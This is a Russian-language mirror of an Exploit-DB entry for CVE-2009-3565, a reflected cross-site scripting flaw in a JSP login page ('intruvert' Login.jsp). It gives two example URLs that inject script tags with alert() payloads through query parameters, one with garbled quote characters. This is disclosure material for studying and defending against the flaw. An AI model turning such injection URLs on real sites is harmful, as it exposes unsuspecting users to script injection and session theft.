- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 10061
- Проверка EDB
-
- Пройдено
- Автор
- DANIEL KING
- Тип уязвимости
- WEBAPPS
- Платформа
- JSP
- CVE
- cve-2009-3565
- Дата публикации
- 2009-11-12
Код:
Attackers can exploit these issues by enticing an unsuspecting victim into following a malicious URI.
The following example URIs are available:
https://www.example.com/intruvert/jsp/module/Login.jsp?password=&Login%2bID=&node=&iaction=precreatefcb14"><script>alert('XSS')</script>8b3283a1e57
https://www.example.com/intruvert/jsp/module/Login.jsp?password=&Login%2bID=&node=8502a"><script>alert(1)</script>2aa99b60533&iaction=precreatefcb14"><script>alert(â??XSSâ??)</script>8b3283a1e57- Источник
- www.exploit-db.com
